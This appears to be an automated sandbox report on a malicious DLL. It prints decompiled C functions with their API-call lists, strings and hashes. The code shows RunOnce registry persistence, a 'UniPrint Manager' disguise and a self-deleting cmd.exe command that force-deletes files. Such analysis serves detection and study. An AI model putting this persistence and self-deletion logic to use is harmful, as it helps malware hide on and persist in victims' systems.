                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,00000000,0099D818), ref: 6F336C8C
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CB5
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CE0
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336D1C
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,00000000,0099D818), ref: 6F336D37
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
                                                                                                                        • String ID: g$h$n$n$p$s$t
                                                                                                                        • API String ID: 1023576463-1140765434
                                                                                                                        • Opcode ID: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction ID: bec72dedb32c6849fc37aabeba5ee61e32b396e40ad84842c132cdbd07fd08d7
                                                                                                                        • Opcode Fuzzy Hash: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction Fuzzy Hash: 468192B2618782AFD700DB68C844E5BB7EDABAA714F04890CF59497380D675E91CCB72
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334CA0(void* __eflags, intOrPtr _a12) {
                                                                                                                        				int _v252;
                                                                                                                        				char _v256;
                                                                                                                        				int _v260;
                                                                                                                        				int _v264;
                                                                                                                        				void* _v276;
                                                                                                                        				void* _v284;
                                                                                                                        				char _v288;
                                                                                                                        				intOrPtr _t25;
                                                                                                                        				void* _t26;
                                                                                                                        				long _t31;
                                                                                                                        				int _t34;
                                                                                                                        				char* _t37;
                                                                                                                        				char* _t45;
                                                                                                                        				int _t49;
                                                                                                                        				int _t56;
                                                                                                                        				char* _t59;
                                                                                                                        				char* _t60;
                                                                                                                        				char* _t71;
                                                                                                                        				CHAR* _t73;
                                                                                                                        				void* _t74;
                                                                                                                        				CHAR* _t76;
                                                                                                                        
                                                                                                                        				_t25 = M6F340588; // 0x7488d8
                                                                                                                        				_t26 = E6F33A2F0(_t25, 0, 0);
                                                                                                                        				_t74 = _t26;
                                                                                                                        				if(_t74 != 0) {
                                                                                                                        					_v288 = 0x4f6e7552;
                                                                                                                        					_v284 = 0x65636e;
                                                                                                                        					wsprintfA( &_v264, "%s\\%s", _t74,  &_v288);
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t74);
                                                                                                                        					_v284 = 0;
                                                                                                                        					_t31 = RegCreateKeyExA(0x80000001,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v284, 0);
                                                                                                                        					if(_t31 != 0) {
                                                                                                                        						L14:
                                                                                                                        						return _t31;
                                                                                                                        					}
                                                                                                                        					if(_a12 == 0) {
                                                                                                                        						_v264 = 0;
                                                                                                                        						_t73 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						if(_t73 == 0) {
                                                                                                                        							L13:
                                                                                                                        							_t31 = RegCloseKey(_v284);
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						_t59 = M6F340530; // 0x997378
                                                                                                                        						_t34 = wsprintfA(_t73, "\"%s\" f", _t59);
                                                                                                                        						_t60 = M6F34053C; // 0x9973a5
                                                                                                                        						_v252 = _t34;
                                                                                                                        						_v264 = 0;
                                                                                                                        						_v260 = 1;
                                                                                                                        						if(RegQueryValueExA(_v276, _t60, 0,  &_v260, 0,  &_v264) != 0) {
                                                                                                                        							L11:
                                                                                                                        							_t37 = M6F34053C; // 0x9973a5
                                                                                                                        							RegSetValueExA(_v276, _t37, 0, 1, _t73, _v252 + 1);
                                                                                                                        							L12:
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t73);
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						_t76 = HeapAlloc(GetProcessHeap(), 8, _v264 + 1);
                                                                                                                        						if(_t76 == 0) {
                                                                                                                        							goto L11;
                                                                                                                        						}
                                                                                                                        						_t45 = M6F34053C; // 0x9973a5
                                                                                                                        						if(RegQueryValueExA(_v276, _t45, 0,  &_v260, _t76,  &_v264) != 0) {
                                                                                                                        							L9:
                                                                                                                        							_t56 = _v256;
                                                                                                                        							L10:
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t76);
                                                                                                                        							if(_t56 != 0) {
                                                                                                                        								goto L12;
                                                                                                                        							}
                                                                                                                        							goto L11;
                                                                                                                        						}
                                                                                                                        						_t49 = lstrcmpiA(_t76, _t73);
                                                                                                                        						_t56 = 1;
                                                                                                                        						if(_t49 == 0) {
                                                                                                                        							goto L10;
                                                                                                                        						}
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					_t71 = M6F34053C; // 0x9973a5
                                                                                                                        					RegDeleteValueA(_v284, _t71);
                                                                                                                        					goto L13;
                                                                                                                        				}
                                                                                                                        				return _t26;
                                                                                                                        			}

























                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A33E
                                                                                                                        • wsprintfA.USER32 ref: 6F334CEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,009973A5), ref: 6F334D42
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F334D58
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334D61
                                                                                                                        • wsprintfA.USER32 ref: 6F334D7A
                                                                                                                        • RegQueryValueExA.ADVAPI32 ref: 6F334DB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F334DC1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334DC4
                                                                                                                        • RegQueryValueExA.ADVAPI32(009973A5,009973A5,00000000,?,00000000,?), ref: 6F334DE4
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 6F334DEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E02
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E05
                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,009973A5,00000000,00000001,00000000,?), ref: 6F334E25
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E2E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E31
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Value$AllocFree$ByteCharMultiQueryWidewsprintf$CloseCreateDeletelstrcmpi
                                                                                                                        • String ID: "%s" f$%s\%s$RunO$nce
                                                                                                                        • API String ID: 5215680-3682672340
                                                                                                                        • Opcode ID: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction ID: 3f126947d0bee041aa488b919a6a471a3df25b4e8b0900cda6c68f3e89514c92
                                                                                                                        • Opcode Fuzzy Hash: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction Fuzzy Hash: 7D418DB2604745ABD720DB65DC88E6B7BBDFBCAB14F00450CF95497240EA72E815CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 71%
                                                                                                                        			E6F3352B0(void* __ebp, intOrPtr _a4) {
                                                                                                                        				char _v256;
                                                                                                                        				char _v264;
                                                                                                                        				long _v268;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				intOrPtr _t7;
                                                                                                                        				void* _t14;
                                                                                                                        				long _t19;
                                                                                                                        				void* _t25;
                                                                                                                        				intOrPtr _t28;
                                                                                                                        				char _t29;
                                                                                                                        				void* _t30;
                                                                                                                        				char _t31;
                                                                                                                        				void* _t33;
                                                                                                                        				intOrPtr _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t38;
                                                                                                                        				long* _t40;
                                                                                                                        				long* _t41;
                                                                                                                        
                                                                                                                        				_t40 =  &_v268;
                                                                                                                        				_t36 = _a4;
                                                                                                                        				if(M6F34050C != 0 || _t36 != 0) {
                                                                                                                        					E6F334130();
                                                                                                                        				}
                                                                                                                        				_t7 = M6F340544; // 0x1
                                                                                                                        				if(_t7 != 0 && (M6F340540 != 0 || _t36 != 0)) {
                                                                                                                        					_t30 = M6F340534; // 0x98a1a0
                                                                                                                        					_push(1);
                                                                                                                        					_push(L"Printer manager");
                                                                                                                        					E6F334C30(_t7, _t30, L"UniPrint Manager");
                                                                                                                        					_t40 =  &(_t40[5]);
                                                                                                                        				}
                                                                                                                        				_push(_t25);
                                                                                                                        				_push(_t33);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				E6F3344D0(_t25, _t33);
                                                                                                                        				_t31 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        				E6F332DF0(_t31, ".pdll");
                                                                                                                        				_t41 =  &(_t40[4]);
                                                                                                                        				Sleep(0xfa0);
                                                                                                                        				_t37 = HeapAlloc(GetProcessHeap(), 8, 0x400);
                                                                                                                        				if(_t37 != 0) {
                                                                                                                        					_v268 = GetTickCount();
                                                                                                                        					_t19 = RtlRandom( &_v268);
                                                                                                                        					_t29 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        					wsprintfA(_t37, "/c ren \"%s*.*\" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q \"%s*.*\"", _t29, _t19, 0xa, _t29);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					E6F334230(0, "cmd.exe", _t37);
                                                                                                                        					_t41 =  &(_t41[0xc]);
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t37);
                                                                                                                        				}
                                                                                                                        				_t28 = M6F34057C; // 0x784250
                                                                                                                        				wsprintfA( &_v264, "%s%s%c", "Global\\", _t28, 0x4b);
                                                                                                                        				_t14 = OpenEventA(2, 0,  &_v256);
                                                                                                                        				_t38 = _t14;
                                                                                                                        				if(_t38 != 0) {
                                                                                                                        					SetEvent(_t38);
                                                                                                                        					return CloseHandle(_t38);
                                                                                                                        				}
                                                                                                                        				return _t14;
                                                                                                                        			}























                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 6F335326
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 6F335339
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33533C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33534E
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33535D
                                                                                                                        • wsprintfA.USER32 ref: 6F335374
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33538F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335392
                                                                                                                        • wsprintfA.USER32 ref: 6F3353B0
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3353BE
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3353CD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3353D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
                                                                                                                        • String ID: %s%s%c$.pdll$/c ren "%s*.*" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q "%s*.*"$Global\$PBx$Printer manager$UniPrint Manager$cmd.exe
                                                                                                                        • API String ID: 1614445722-4243253615
                                                                                                                        • Opcode ID: ba37e0c0f02a68561fffb622586f4a8f2ac996f22f6025285a002598ccb8c806
                                                                                                                        • Instruction ID: 3eeff7da2809fba3f8b062ba8bb9e4adb4a81316cc12832d6a9a884bedf6cb9d
                                                                                                                        • Opcode Fuzzy Hash: ba37e0c0f02a68561fffb622586f4a8f2ac996f22f6025285a002598ccb8c806
                                                                                                                        • Instruction Fuzzy Hash: 64315BB3E00BA57BE620E764DC09F5B376DEB46B20F000108F910AB2C0DBB5F4248BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F331100(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                        				short _v512;
                                                                                                                        				short _v520;
                                                                                                                        				short _v1036;
                                                                                                                        				short _v1040;
                                                                                                                        				short _v1044;
                                                                                                                        				short _v1048;
                                                                                                                        				short _v1052;
                                                                                                                        				intOrPtr _t24;
                                                                                                                        				WCHAR* _t39;
                                                                                                                        				void* _t41;
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				void* _t67;
                                                                                                                        				void* _t73;
                                                                                                                        				void* _t75;
                                                                                                                        				long* _t77;
                                                                                                                        
                                                                                                                        				_t24 = _a4;
                                                                                                                        				 *_t77 = 0;
                                                                                                                        				if(_t24 != 2) {
                                                                                                                        					if(_t24 != 3) {
                                                                                                                        						goto L16;
                                                                                                                        					} else {
                                                                                                                        						CloseHandle( *(_a8 + 0x14));
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t71 = _a8;
                                                                                                                        					_v1052 =  *(_a8 + 0x10);
                                                                                                                        					_t75 = E6F33A360( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
                                                                                                                        					_t77 =  &(_t77[3]);
                                                                                                                        					if(_t75 != 0) {
                                                                                                                        						_t73 = E6F33A360( *((intOrPtr*)(_t71 + 4)), ( *(_t71 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
                                                                                                                        						_t77 =  &(_t77[3]);
                                                                                                                        						if(_t73 != 0) {
                                                                                                                        							wsprintfW( &_v1048, L"\\\\.\\%s%s", _t75, _t73);
                                                                                                                        							_t77 =  &(_t77[4]);
                                                                                                                        							PathRemoveFileSpecW( &_v1040);
                                                                                                                        							PathAddBackslashW( &_v1040);
                                                                                                                        							_t39 =  &_v1040;
                                                                                                                        							__imp__SHCreateDirectoryExW(0, _t39, 0, _t67);
                                                                                                                        							if(_t39 == 0 || _t39 == 0x50 || _t39 == 0xb7) {
                                                                                                                        								wsprintfW( &_v1052, L"\\\\.\\%s%s", _t75, _t73);
                                                                                                                        								_t77 =  &(_t77[4]);
                                                                                                                        								_t41 = CreateFileW( &_v1044, 0xc0000000, 0, 0, 4, 0x80, 0);
                                                                                                                        								if(_t41 != 0xffffffff) {
                                                                                                                        									L11:
                                                                                                                        									_v1052 = _t41;
                                                                                                                        								} else {
                                                                                                                        									if( *_v1048 != 0 && GetFileAttributesW( &_v1044) != 0xffffffff) {
                                                                                                                        										_t65 =  *0x6f340270; // 0x0
                                                                                                                        										wsprintfW( &_v520, L"%s%c%lu%s",  &_v1044, 0x2e, _t65, L".bak");
                                                                                                                        										_t77 =  &(_t77[6]);
                                                                                                                        										if(MoveFileExW( &_v1036,  &_v512, 0) != 0) {
                                                                                                                        											_t41 = CreateFileW( &_v1036, 0xc0000000, 0, 0, 4, 0x80, 0);
                                                                                                                        											if(_t41 != 0xffffffff) {
                                                                                                                        												goto L11;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t73);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t75);
                                                                                                                        					}
                                                                                                                        					L16:
                                                                                                                        					return  *_t77;
                                                                                                                        				}
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3312A8
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,74786900,6F3339D7,?,00000000,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • wsprintfW.USER32 ref: 6F33117D
                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 6F331187
                                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 6F331192
                                                                                                                        • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 6F3311A1
                                                                                                                        • wsprintfW.USER32 ref: 6F3311C8
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F3311EA
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F3311FF
                                                                                                                        • wsprintfW.USER32 ref: 6F33122A
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 6F33123E
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F33125F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33126E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331275
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33127F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
                                                                                                                        • String ID: %s%c%lu%s$.bak$\\.\%s%s
                                                                                                                        • API String ID: 452034401-1383541090
                                                                                                                        • Opcode ID: f3ecaa0985d5cd4be74035b0c356dd03693a1fcb47ccd40629ccc27ff52548a0
                                                                                                                        • Instruction ID: 63b981e06f3eb6282e5fb6294b6f91e10a03dd73e991e1b444485a580a32a779
                                                                                                                        • Opcode Fuzzy Hash: f3ecaa0985d5cd4be74035b0c356dd03693a1fcb47ccd40629ccc27ff52548a0
                                                                                                                        • Instruction Fuzzy Hash: 2541C273A04394ABD720EBA0CC85FAB77ACEB48B20F004A0CF655D61C0D7B5E414C7A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 56%
                                                                                                                        			E6F337F10(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct HWND__* _a20) {
                                                                                                                        				void* _t7;
                                                                                                                        				struct HWND__* _t8;
                                                                                                                        				struct HWND__* _t11;
                                                                                                                        				void* _t16;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				intOrPtr _t31;
                                                                                                                        				void* _t33;
                                                                                                                        				void* _t35;
                                                                                                                        				struct HINSTANCE__* _t40;
                                                                                                                        				struct HWND__* _t41;
                                                                                                                        				void* _t45;
                                                                                                                        				void* _t46;
                                                                                                                        				void* _t47;
                                                                                                                        
                                                                                                                        				_t45 = __ebp;
                                                                                                                        				_t29 = _a8;
                                                                                                                        				if(_t29 == 0x275b || _t29 == 0x2755 || _t29 == 0x2ae1) {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t40 = _a4;
                                                                                                                        					_t7 = E6F334E50(_t40, _t29);
                                                                                                                        					_t47 = _t46 + 8;
                                                                                                                        					_t35 = _t7;
                                                                                                                        					_t8 = _a20;
                                                                                                                        					_push(_t8);
                                                                                                                        					_push(_a16);
                                                                                                                        					_push(_a12);
                                                                                                                        					if(_t35 == 0) {
                                                                                                                        						_push(_t29);
                                                                                                                        						_push(_t40);
                                                                                                                        						M6F3405E8();
                                                                                                                        						_t41 = _t8;
                                                                                                                        					} else {
                                                                                                                        						_t41 = CreateDialogIndirectParamW(_t40, _t35, ??, ??, ??);
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t35);
                                                                                                                        					}
                                                                                                                        					if(_t41 == 0) {
                                                                                                                        						L17:
                                                                                                                        						return _t41;
                                                                                                                        					} else {
                                                                                                                        						SetWindowTextA(_t41, 0x6f33d664);
                                                                                                                        						if(_t29 != 0x2872) {
                                                                                                                        							__eflags = _t29 - 0x2768;
                                                                                                                        							if(_t29 != 0x2768) {
                                                                                                                        								goto L17;
                                                                                                                        							} else {
                                                                                                                        								_t11 = GetDlgItem(_t41, 0x4e7d);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								__eflags = _t11;
                                                                                                                        								if(_t11 == 0) {
                                                                                                                        									PostMessageA(_t41, 0x10, ??, ??);
                                                                                                                        									goto L17;
                                                                                                                        								} else {
                                                                                                                        									PostMessageA(_t11, 0xf5, ??, ??);
                                                                                                                        									return _t41;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t56 = M6F3404B4;
                                                                                                                        							if(M6F3404B4 != 0) {
                                                                                                                        								E6F3352B0(_t45, 1);
                                                                                                                        								_t47 = _t47 + 4;
                                                                                                                        								ExitProcess(0);
                                                                                                                        							}
                                                                                                                        							_push(0);
                                                                                                                        							E6F3328B0(".pdll");
                                                                                                                        							_t16 = M6F340534; // 0x98a1a0
                                                                                                                        							_t31 = M6F340544; // 0x1
                                                                                                                        							_push(0);
                                                                                                                        							_push(L"Printer manager");
                                                                                                                        							M6F340540 = E6F334C30(_t31, _t16, L"UniPrint Manager");
                                                                                                                        							M6F34050C = E6F333C60();
                                                                                                                        							E6F334CA0(_t56, 0);
                                                                                                                        							if(M6F3404AC != 0) {
                                                                                                                        								_t33 = M6F340534; // 0x98a1a0
                                                                                                                        								_push(0xffffffff);
                                                                                                                        								E6F333610(_t33);
                                                                                                                        								ExitProcess(0);
                                                                                                                        							}
                                                                                                                        							 *0x6f340398 = _t41;
                                                                                                                        							CallWindowProcW(E6F337790, _t41, 0x83fc, GetWindowLongW(_t41, 0xfffffffc), 0);
                                                                                                                        							SetWindowLongW(_t41, 0xfffffffc, E6F337790);
                                                                                                                        							return _t41;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

















                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F334E50: FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                          • Part of subcall function 6F334E50: LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                          • Part of subcall function 6F334E50: SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                          • Part of subcall function 6F334E50: LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                          • Part of subcall function 6F334E50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                          • Part of subcall function 6F334E50: HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                          • Part of subcall function 6F334E50: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                          • Part of subcall function 6F334E50: FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        • CreateDialogIndirectParamW.USER32 ref: 6F337F60
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F337F6B
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F337F72
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F3328F3
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F332911
                                                                                                                          • Part of subcall function 6F3328B0: FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D538), ref: 6F332950
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                          • Part of subcall function 6F3328B0: lstrcatA.KERNEL32(?,?), ref: 6F332973
